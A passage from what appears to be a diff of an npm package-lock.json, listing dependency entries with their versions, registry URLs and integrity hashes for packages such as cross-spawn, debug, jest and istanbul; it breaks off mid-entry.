"sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true - }, - "electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" - }, - "form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - } - }, - "jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - } - }, - "jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.4.3", - "resolved": 